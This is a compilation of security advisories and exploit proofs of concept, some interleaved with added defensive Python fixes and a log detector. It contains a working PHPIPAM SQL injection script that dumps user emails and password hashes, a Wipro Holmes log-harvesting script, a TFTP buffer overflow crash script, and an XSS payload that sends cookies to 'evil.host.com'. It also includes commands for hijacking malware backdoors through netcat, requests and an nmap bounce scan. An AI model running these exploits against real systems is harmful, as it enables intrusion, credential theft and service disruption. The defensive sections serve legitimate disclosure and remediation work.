<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/4087cffab90fa22c2882e2f97a467e8e.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Hanuman.b<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 3333. Third-party attackers who can reach an infected system can run any OS commands hijacking the compromised host. <br />Type: PE32<br />MD5: 4087cffab90fa22c2882e2f97a467e8e<br />Vuln ID: MVID-2022-0467 <br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 3333<br />Hanuman Server [DOS SHELL DAEMON]<br />WEB : www.junkcode.cjb.net<br /><br /> You are Client No. : 1<br /> Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\WINDOWS>whoami<br />whoami<br />desktop-2c4jqho\victim<br /><br />C:\WINDOWS>net user malvuln 13 /add<br />net user malvuln 13 /add<br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection<br /># Date: 20/11/2021<br /># Exploit Author: Ilker Burak ADIYAMAN<br /># Vendor Homepage: https://aimeos.org<br /># Software Link: https://aimeos.org/laravel-ecommerce-package<br /># Version: Aimeos 2021.10 LTS<br /># Tested on: MacOSX<br /><br />*Description:*<br /><br />The Aimeos E-Commerce framework Laravel application is vulnerable to SQL injection via the 'sort' parameter of the JSON API.<br /><br />==================== 1. SQLi ====================<br /><br />https://127.0.0.1/default/jsonapi/review?sort=-ctime<br /><br />The "sort" parameter is vulnerable to SQL injection; the resulting database error reveals table and column names.<br /><br />Step 1: Copy the JSON API GET request above.<br />Step 2: Change the sort parameter value to --<br /><br />----------------------------------------------------------------------<br />Parameter: sort (GET)<br /> Type: error based<br /> Title: GET parameter 'sort' appears to be injectable<br /> Payload: sort=--<br /><br /></code></pre>
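As an added example (not Aimeos project code), the Python below shows the fix for this class of bug: a JSON:API style sort value such as `-ctime` is parsed against a column allowlist, so the ORDER BY clause is built only from known column names and a value like `--` is refused before any SQL exists. The entries in REVIEW_SORT_COLUMNS are constructed for the demo.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample allowlist: API field name -> real column expression.
# Only names that appear here can ever reach the ORDER BY clause.
REVIEW_SORT_COLUMNS: Dict[str, str] = {
    "ctime": "mrev.ctime",
    "mtime": "mrev.mtime",
    "rating": "mrev.rating",
}

# One optional leading "-" (descending) followed by a plain identifier.
_FIELD_RE = re.compile(r"^-?[a-z][a-z0-9_]*$")


class InvalidSortParameter(ValueError):
    """Raised when the sort parameter is malformed or names an unknown field."""


def parse_sort(sort: str, allowed: Dict[str, str]) -> List[Tuple[str, str]]:
    """Turn "-ctime,rating" into [("mrev.ctime", "DESC"), ("mrev.rating", "ASC")].

    The SQL column text always comes from the allowlist, never from the
    request, so a value such as "--" fails the pattern check and is refused.
    """
    pairs = []
    for raw in sort.split(","):
        field = raw.strip()
        if not _FIELD_RE.match(field):
            raise InvalidSortParameter(f"malformed sort field: {raw!r}")
        direction = "DESC" if field.startswith("-") else "ASC"
        name = field.lstrip("-")
        if name not in allowed:
            raise InvalidSortParameter(f"unknown sort field: {name!r}")
        pairs.append((allowed[name], direction))
    return pairs


def build_order_by(sort: str, allowed: Dict[str, str] = REVIEW_SORT_COLUMNS) -> str:
    """Return the ORDER BY fragment for a validated sort string ("" if no sort)."""
    if not sort.strip():
        return ""
    pairs = parse_sort(sort, allowed)
    return "ORDER BY " + ", ".join(f"{col} {direction}" for col, direction in pairs)


def is_valid_sort(sort: str, allowed: Dict[str, str] = REVIEW_SORT_COLUMNS) -> bool:
    """Convenience predicate: True if build_order_by would accept the value."""
    try:
        build_order_by(sort, allowed)
    except InvalidSortParameter:
        return False
    return True


if __name__ == "__main__":
    print(build_order_by("-ctime"))  # ORDER BY mrev.ctime DESC
    for candidate in ("--", "ctime;DROP TABLE x", "-password"):
        print(f"{candidate!r} accepted: {is_valid_sort(candidate)}")
```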
<pre><code>Advisory ID: TO-2021-001<br />Product: WebACMS<br />Vendor: AFI Solutions GmbH<br />Tested Version: 2.1.0<br />Fixed Version: -<br />Vulnerability Type: Cross-Site Scripting (CWE-79)<br />CVSSv2 Severity: AV:N/AC:L/Au:N/C:P/I:P/A:N (Score 6.4)<br />CVSSv3 Severity: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (Score 6.1)<br />Solution Status: Unfixed<br />Manufacturer Notification: 2021-12-13<br />Solution Date: 2022-01-17<br />Public Disclosure: 2022-01-20<br />CVE Reference: CVE-2021-44829<br />Authors of Advisory: Patrick Hener & Siva Rajendran, Thinking Objects GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The product "ACMS" of AFI Solutions GmbH [1] is a so-called EDI converter.<br />For companies to be able to exchange arbitrary data it is common to use an<br />EDI converter to convert between the data formats of the sender and the<br />recipient. The product of AFI Solutions also incorporates a web interface,<br />which is the subject of this advisory.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The index page has a parameter "ID" which is used to navigate within the web<br />application. It is not properly sanitized and is also rendered into the login<br />form of the index page. The vulnerable code is shown in the following listing:<br /><br /><FORM name=thisForm METHOD=post action="/index.html?id=1" target="_top"><br /> <table class="logintable"><br /> <tr><br /> <td width="110">Benutzername</td><br /> [.. truncated ..]<br /></form><br /><br />The parameter can be set from the URL in the browser and thus is unsanitized,<br />user-controlled input. This makes the application vulnerable to reflected<br />Cross-Site Scripting. This vulnerability also applies to basically all<br />user-controlled input after login. 
Content returned by the database is likewise not sanitized before it is<br />presented, so the application is also vulnerable to stored Cross-Site<br />Scripting.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />The following request will steal the application's insecure cookies using<br />this vulnerability.<br /><br />GET /index.html?id=%22%3E%3Cscript%3Edocument.location=%27http://evil.host.com/cookies?%27%2Bdocument.cookie;%3C/script%3E%3Cid=%22 HTTP/1.1<br />Host: vulnerable.host.com<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: COMID=<br />Upgrade-Insecure-Requests: 1<br /><br />This renders to the following HTML code and triggers in the victim's<br />browser.<br /><br /><FORM name=thisForm METHOD=post action="/index.html?id="><script>document.location='http://evil.host.com/cookies?'+document.cookie;</script><id="" target="_top"><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />User-supplied data should be sanitized before it is used to render a page.<br />Content retrieved from the database should likewise be sanitized before it<br />is presented to the browser again.<br /><br />The vendor states that this software component was only used by the vendor's<br />support and that it is not actively used anymore. 
The vendor recommends deactivating this component.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br />2021-12-10: Vulnerability discovered<br />2021-12-13: Vulnerability reported to manufacturer<br />2022-01-17: Solution provided by manufacturer<br />2022-01-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Vendor Website<br /> https://www.afi-solutions.com/<br />[2] Thinking Objects Security Advisory<br /> https://blog.to.com/advisory-webacms-2-1-0-cross-site-scripting<br />[3] Thinking Objects Responsible Disclosure Policy<br /> https://blog.to.com/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Patrick Hener and Siva Rajendran<br />of Thinking Objects GmbH.<br /><br />E-Mail: patrick.hener@to.com<br />Public Keys: https://to.com/pgp-keys<br />Key ID: 877756EA2CB50685<br />Key Fingerprint: 2605 3D51 3FAA 3795 E116 95EC 8777 56EA 2CB5 0685<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /></code></pre>
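The advisory's solution section asks for sanitizing user-supplied data before rendering. The added Python below (not WebACMS code) places the vulnerable interpolation of the `id` parameter into the form's action attribute next to a hardened version that encodes the value for its URL and HTML contexts, and uses Python's HTML parser to show which tags each rendering actually produces. The probe string is constructed and is not the advisory's cookie-stealing payload.

```python
import html
from html.parser import HTMLParser
from typing import List
from urllib.parse import quote

# Trimmed copy of the login form from the advisory; {id} marks where the
# request parameter is interpolated into the action attribute.
FORM_TEMPLATE = (
    '<FORM name=thisForm METHOD=post action="/index.html?id={id}" target="_top">'
    '<table class="logintable"><tr><td width="110">Benutzername</td></tr></table>'
    "</form>"
)

# Constructed probe: closes the attribute and the tag, then injects a new element.
PROBE = '"><b>injected</b><id="'


def render_login_form(id_param: str) -> str:
    """Vulnerable pattern: the raw parameter lands inside the attribute value."""
    return FORM_TEMPLATE.format(id=id_param)


def render_login_form_safe(id_param: str) -> str:
    """Hardened pattern: encode for the URL context, then for the HTML context.

    quote() with an empty safe set percent-encodes ", <, > and ' for the query
    string; html.escape(quote=True) then entity-encodes anything that could
    still terminate the attribute, so the browser sees a single attribute value.
    """
    encoded = html.escape(quote(id_param, safe=""), quote=True)
    return FORM_TEMPLATE.format(id=encoded)


class _TagCollector(HTMLParser):
    """Records the start tags a lenient HTML parser sees in the markup."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup: str) -> List[str]:
    """Parse markup the way a browser-like parser would and list its start tags."""
    collector = _TagCollector()
    collector.feed(markup)
    return collector.tags


if __name__ == "__main__":
    print("vulnerable:", start_tags(render_login_form(PROBE)))
    print("hardened:  ", start_tags(render_login_form_safe(PROBE)))
```

Marking the session cookie HttpOnly keeps it out of document.cookie, the channel the advisory's PoC reads; that narrows the impact of the reflected XSS but does not remove the injection itself.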
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/d2b933ebadd5c808ca4c68ae173e2d62.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.ad<br />Vulnerability: Insecure Credential Storage<br />Description: The malware listens on TCP port 87. Its default password "hoanggia" is stored in the Windows registry in cleartext under "clrprv.oo" in "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\System\NPP". The password is also set as the cookie value "Cookie: pass=hoanggia; day=14; month=11; year=2021", which is sent over the network in plaintext. Third-party attackers who can access the system or sniff traffic can grab the password, then execute any programs and/or run commands made available by the backdoor.<br /><br />Execute programs<br />http://x.x.x.x:87/brow?exe=C:\Windows\system32\calc.exe<br /><br />Screenshots<br />http://x.x.x.x:87/scrs?<br /><br />Websites visited<br />http://x.x.x.x:87/web?<br /><br />Keys pressed<br />http://x.x.x.x:87/key?<br /><br />File system browsing<br />http://x.x.x.x:87/brow?<br /><br />Apps used<br />http://x.x.x.x:87/run?<br /><br />Outlook emails<br />http://x.x.x.x:87/chatoutlook?app=out<br /><br />Misc CMDs<br />http://x.x.x.x:87/main?cmd=shutdown<br />http://x.x.x.x:87/main?cmd=logoff<br />http://x.x.x.x:87/main?cmd=reboot<br /><br />Type: PE<br />MD5: d2b933ebadd5c808ca4c68ae173e2d62<br />Vuln ID: MVID-2021-0406<br />Disclosure: 11/21/2021<br /><br /><br />Exploit/PoC:<br />import requests<br /><br /># authenticate with the cleartext password, then reuse the session cookie<br />with requests.Session() as s:<br />    p = s.post("http://x.x.x.x:87/main", data={'pass':"hoanggia"})<br />    r = s.get("http://x.x.x.x:87/brow?exe=calc")<br />    print(r.status_code)<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: PHPIPAM 1.4.4 - SQLi (Authenticated)<br /># Google Dork: [if applicable]<br /># Date: 20/01/2022<br /># Exploit Author: Rodolfo "Inc0gbyt3" Tavares<br /># Vendor Homepage: https://github.com/phpipam/phpipam<br /># Software Link: https://github.com/phpipam/phpipam<br /># Version: 1.4.4<br /># Tested on: Linux/Windows<br /># CVE : CVE-2022-23046<br /><br />import requests<br />import sys<br />import argparse<br /><br />################<br />"""<br />Author of exploit: Rodolfo 'Inc0gbyt3' Tavares<br />CVE: CVE-2022-23046<br />Type: SQL Injection<br /><br />Usage:<br /><br />$ python3 -m pip install requests<br />$ python3 exploit.py -u http://localhost:8082 -U <admin> -P <password><br />"""<br />###############<br /><br />__author__ = "Inc0gbyt3"<br /><br />USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"<br /><br />menu = argparse.ArgumentParser(description="[+] Exploit for PHPIPAM Version: 1.4.4 Authenticated SQL Injection\n CVE-2022-23046")<br />menu.add_argument("-u", "--url", help="[+] URL of target, example: https://phpipam.target.com", type=str)<br />menu.add_argument("-U", "--user", help="[+] Username", type=str)<br />menu.add_argument("-P", "--password", help="[+] Password", type=str)<br />args = menu.parse_args()<br /><br /># all three options are needed; stop here instead of continuing with None values<br />if len(sys.argv) < 3 or not (args.url and args.user and args.password):<br />    menu.print_help()<br />    sys.exit(1)<br /><br />target = args.url<br />user = args.user<br />password = args.password<br /><br /><br />def get_token():<br />    """Log in and return the phpipam session cookie, or None if login failed."""<br />    u = f"{target}/app/login/login_check.php"<br /><br />    try:<br />        r = requests.post(u, verify=False, timeout=10, headers={"User-Agent": USER_AGENT, "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, data={"ipamusername": user, "ipampassword": password})<br />        headers = r.headers['Set-Cookie']<br />        headers_string = headers.split(';')<br />        for s in headers_string:<br />            if "phpipam" in s and "," in s:  # double same cookie Check LoL<br />                cookie = s.strip(',').lstrip()<br />                return cookie<br />    except Exception as e:<br />        print(f"[+] {e}")<br />    return None<br /><br /><br />def exploit_sqli():<br />    cookie = get_token()<br />    if cookie is None:<br />        print("[-] No session cookie obtained, check URL and credentials")<br />        return<br />    xpl = f"{target}/app/admin/routing/edit-bgp-mapping-search.php"<br />    data = {<br />        "subnet": 'pwn"union select(select concat(@:=0x3a,(select+count(*) from(users)where(@:=concat(@,email,0x3a,password,"0x3a",2fa))),@)),2,3,user() -- -',  # dios query dump all :)<br />        "bgp_id": 1<br />    }<br /><br />    headers = {<br />        "User-Agent": USER_AGENT,<br />        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",<br />        "Cookie": cookie<br />    }<br /><br />    try:<br />        r = requests.post(xpl, verify=False, timeout=10, headers=headers, data=data)<br />        if "admin" in r.text or "rounds" in r.text:<br />            print("[+] Vulnerable..\n\n")<br />            print(f"> Users and hash passwords: \n\n{r.text}")<br />            print("\n\n> DONE <")<br />    except Exception as e:<br />        print(f"[-] {e}")<br /><br /><br />if __name__ == '__main__':<br />    exploit_sqli()<br /></code></pre>
<pre><code># Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure<br /># Date: 09/08/2021<br /># Exploit Author: Rizal Muhammed @ub3rsick<br /># Vendor Homepage: https://www.wipro.com/holmes/<br /># Version: 20.4.1<br /># Tested on: Windows 10 x64<br /># CVE : CVE-2021-38283<br /><br />import requests as rq<br />import argparse<br />import datetime<br />import os<br />from calendar import monthrange<br /><br /># Change if running on different port<br />port = 8001<br /><br /># Log files exposed under /log/&lt;date&gt;/ without authentication<br />log_list = [<br />    "AlertService.txt",<br />    "ApprovalService.txt",<br />    "AuditService.txt",<br />    "CustomerController.txt",<br />    "CustomerDomainCredentialService.txt",<br />    "CustomerFileService.txt",<br />    "CustomerService.txt",<br />    "DashboardController.txt",<br />    "DataParseService.txt",<br />    "DomainService.txt",<br />    "ExecutionService.txt",<br />    "ExternalAPIService.txt",<br />    "FilesController.txt",<br />    "FormService.txt",<br />    "InfrastructureService.txt",<br />    "ITSMConfigPrepService.txt",<br />    "LicenseService.txt",<br />    "LoginService.txt",<br />    "MailService.txt",<br />    "MasterdataController.txt",<br />    "NetworkService.txt",<br />    "OrchestrationPreparationService.txt",<br />    "ProblemInfrastructureService.txt",<br />    "ProcessExecutionService.txt",<br />    "ServiceRequestService.txt",<br />    "SolutionController.txt",<br />    "SolutionLiveService.txt",<br />    "SolutionService.txt",<br />    "StorageService.txt",<br />    "TaskService.txt",<br />    "TicketingService.txt",<br />    "UserController.txt",<br />    "UtilityService.txt"<br />]<br /><br />def check_month(val):<br />    ival = int(val)<br />    if ival > 0 and ival < 13:<br />        return ival<br />    else:<br />        raise argparse.ArgumentTypeError("%s is not a valid month" % val)<br /><br />def check_year(val):<br />    iyear = int(val)<br />    if iyear >= 1960 and iyear <= datetime.date.today().year:<br />        return iyear<br />    else:<br />        raise argparse.ArgumentTypeError("%s is not a valid year" % val)<br /><br /><br />def do_request(target, date, log_file):<br />    log_url = "http://%s/log/%s/%s" % (target, date, log_file)<br /><br />    log_name = "%s_%s" % (date, log_file)<br />    print("[*] Requesting Log: /log/%s/%s" % (date, log_file))<br /><br />    resp = rq.get(log_url)<br /><br />    # a 200 that still contains the vendor string is a generic page, not a log<br />    if resp.status_code == 200 and not "Wipro Ltd." in resp.text:<br />        print("[+] Success : %s" % log_url)<br />        #print (resp.text[0:150] + "\n<...snipped...>")<br />        with open("logs/%s" % log_name, 'w') as lf:<br />            lf.write(resp.text)<br />        print("[*] Log File Written to ./logs/%s" % (log_name))<br /><br />def main():<br /><br />    parser = argparse.ArgumentParser(<br />        description="Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure",<br />        epilog="Vulnerability Discovery, PoC Author - Rizal Muhammed @ub3rsick"<br />    )<br /><br />    parser.add_argument("-t","--target-ip", help="IP Address of the target server", required=True)<br />    parser.add_argument("-m","--month", help="Month of the log, (1=JAN, 2=FEB etc.)", required=True, type=check_month)<br />    parser.add_argument("-y","--year", help="year of the log", required=True, type=check_year)<br />    args = parser.parse_args()<br /><br />    # one ISO date string per day of the requested month<br />    ndays = monthrange(args.year, args.month)[1]<br />    date_list = ["%s" % datetime.date(args.year, args.month, day) for day in range(1, ndays+1)]<br /><br />    target = "%s:%s" % (args.target_ip, port)<br /><br />    # create folder "logs" to save log files, if it does not exist<br />    if not os.path.exists("./logs"):<br />        os.makedirs("./logs")<br /><br />    for log_date in date_list:<br />        for log_file in log_list:<br />            do_request(target, log_date, log_file)<br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>
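From the defender's side, the traffic the PoC above generates (one client requesting /log/&lt;date&gt;/&lt;service&gt;.txt for every day of a month and every known service name) stands out in web-server access logs. The added Python below (not the PoC author's code) parses Common Log Format lines and flags clients that pull log files across several dates or several services; the log lines and the thresholds are constructed assumptions to tune per deployment.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Path shape the PoC walks: /log/<YYYY-MM-DD>/<ServiceName>.txt
LOG_PATH_RE = re.compile(r"^/log/(\d{4}-\d{2}-\d{2})/([A-Za-z]+\.txt)$")

# Common Log Format line; enough fields for this check.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines: one client walking dates and files, two normal ones.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jan/2022:10:01:02 +0000] "GET /login HTTP/1.1" 200 5123
10.0.0.9 - - [17/Jan/2022:10:02:10 +0000] "GET /log/2022-01-01/AlertService.txt HTTP/1.1" 200 8812
10.0.0.9 - - [17/Jan/2022:10:02:10 +0000] "GET /log/2022-01-01/LoginService.txt HTTP/1.1" 200 13021
10.0.0.9 - - [17/Jan/2022:10:02:11 +0000] "GET /log/2022-01-02/AlertService.txt HTTP/1.1" 200 7711
10.0.0.9 - - [17/Jan/2022:10:02:11 +0000] "GET /log/2022-01-02/LoginService.txt HTTP/1.1" 200 12002
10.0.0.9 - - [17/Jan/2022:10:02:12 +0000] "GET /log/2022-01-03/MailService.txt HTTP/1.1" 404 233
10.0.0.7 - - [17/Jan/2022:10:05:00 +0000] "GET /log/2022-01-17/AuditService.txt HTTP/1.1" 200 4410
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the CLF fields of one access-log line, or None if it does not parse."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def find_log_harvesting(lines, min_dates: int = 2, min_files: int = 3) -> List[dict]:
    """Flag clients that fetch log files for several dates or several services.

    Every /log/<date>/<file>.txt request counts regardless of status: the
    enumeration pattern is the signal, and the PoC's own success test (a 200
    whose body lacks the vendor string) shows a 200 alone proves nothing.
    """
    per_ip = defaultdict(lambda: {"dates": set(), "files": set(), "hits": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        m = LOG_PATH_RE.match(rec["path"])
        if not m:
            continue
        date, fname = m.groups()
        stats = per_ip[rec["ip"]]
        stats["dates"].add(date)
        stats["files"].add(fname)
        stats["hits"] += 1

    findings = []
    for ip, stats in per_ip.items():
        if len(stats["dates"]) >= min_dates or len(stats["files"]) >= min_files:
            findings.append({
                "ip": ip,
                "hits": stats["hits"],
                "dates": sorted(stats["dates"]),
                "files": sorted(stats["files"]),
            })
    return sorted(findings, key=lambda f: f["ip"])


if __name__ == "__main__":
    for finding in find_log_harvesting(SAMPLE_LOG.splitlines()):
        print(f"{finding['ip']}: {finding['hits']} log requests over "
              f"{len(finding['dates'])} dates, {len(finding['files'])} distinct files")
```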
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/09dd14d3988e08a56798b1480c55a5b0_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP99<br />Vulnerability: Port Bounce Scan (MITM)<br />Description: The malware listens on TCP port 1492. Third-party intruders who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you.<br />Type: PE32<br />MD5: 09dd14d3988e08a56798b1480c55a5b0<br />Vuln ID: MVID-2022-0466<br />Dropped files: Windll16.exe<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />nmap -n -Pn -b hackcity:@192.168.18.129:1492 -p21,22,80 192.168.18.237 -v<br />Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-17 16:29 UTC-11<br />Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129).<br />Attempting connection to ftp://hackcity:@192.168.18.129:1492<br />Connected:220-Serv-U FTP-Server v2.3b for WinSock ready...<br />220 0wn3d<br />Login credentials accepted by FTP server!<br />Initiating Bounce Scan at 16:29<br />Removed 21<br />Changed my mind about port 21<br />Discovered open port 80/tcp on 192.168.18.237<br />Removed 22<br />Changed my mind about port 22<br />Completed Bounce Scan at 16:29, 2.17s elapsed (3 total ports)<br />Nmap scan report for 192.168.18.237<br />Host is up.<br /><br />PORT STATE SERVICE<br />21/tcp closed ftp<br />22/tcp closed ssh<br />80/tcp open http<br /><br />Read data files from: C:\Program Files (x86)\Nmap<br />Nmap done: 1 IP address (1 host up) scanned in 9.44 seconds <br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
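The bounce scan above works because the backdoor's FTP server honours a PORT command pointing at any host. As an added example (not the backdoor's or Nmap's code), the Python below implements a PORT handler with the two checks RFC 2577 recommends: the data address must equal the control connection's peer and the port must be unprivileged. The peer addresses used in the demo are constructed.

```python
import ipaddress
import re
from typing import Tuple

# PORT h1,h2,h3,h4,p1,p2 as defined by RFC 959.
PORT_RE = re.compile(
    r"^PORT\s+(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$",
    re.IGNORECASE,
)


class PortRejected(ValueError):
    """Carries the FTP reply line the server should send back."""


def parse_port_argument(command: str) -> Tuple[str, int]:
    """Decode the PORT argument into (host, port) without any policy check."""
    m = PORT_RE.match(command)
    if not m:
        raise PortRejected("501 Syntax error in PORT parameters")
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):
        raise PortRejected("501 PORT value out of range")
    host = ".".join(str(n) for n in nums[:4])
    port = nums[4] * 256 + nums[5]
    return host, port


def validate_port_command(command: str, peer_ip: str) -> Tuple[str, int]:
    """Accept a PORT target only if it is the control connection's own peer.

    Two checks close the bounce hole: the data address must equal the client
    address (no relaying to third parties), and the port must be unprivileged,
    so the server cannot be used to probe well-known services on its behalf.
    """
    host, port = parse_port_argument(command)
    if ipaddress.ip_address(host) != ipaddress.ip_address(peer_ip):
        raise PortRejected("500 PORT address does not match control connection")
    if port < 1024:
        raise PortRejected("500 PORT to privileged port refused")
    return host, port


def handle_port(command: str, peer_ip: str) -> str:
    """Reply line an FTP server would send for this PORT command."""
    try:
        host, port = validate_port_command(command, peer_ip)
    except PortRejected as exc:
        return str(exc)
    return f"200 PORT command successful ({host}:{port})"


if __name__ == "__main__":
    scanner = "192.168.18.5"  # constructed: the client holding the control connection
    # Bounce attempt: asks the server to open a data connection to a third host, port 80.
    print(handle_port("PORT 192,168,18,237,0,80", scanner))
    # Legitimate active-mode transfer back to the same client on a high port.
    print(handle_port("PORT 192,168,18,5,206,190", scanner))
```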
<pre><code># Exploit Title: Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)<br /># Discovered by: Yehia Elghaly<br /># Discovered Date: 2021-11-19<br /># Vendor Homepage: http://www.ipuptime.net/<br /># Software Link : http://ipuptime.net/PinkieSetup.zip<br /># Tested Version: 2.15<br /># Vulnerability Type: Buffer Overflow (DoS) Remote<br /># Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64<br /><br /># Description: Pinkie 2.15 TFTP Remote Buffer Overflow<br /><br /># Steps to reproduce:<br /># 1. - Download and install Pinkie 2.15<br /># 2. - Start TFTP Server listening on port 69<br /># 3. - Run the Script from remote PC/IP<br /># 4. - Crashed<br /><br /><br />#!/usr/bin/env python3<br /><br />import socket<br /><br />sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)<br /><br />read = (<br /> #Request - read<br /> b'\x00\x01' #Static - opcode<br /> + b')' * 32768 + #String - source_file (mutant, size=32768, orig val: b'File.bin')<br /> b'\x00' #Delim - delim1<br /> b'netascii' #String - transfer_mode<br /> b'\x00' #Delim - delim2<br />)<br />sock.sendto(read, ('192.168.1.207', 69))<br />sock.recv(65535)<br /><br />sock.close()<br /> <br /></code></pre>
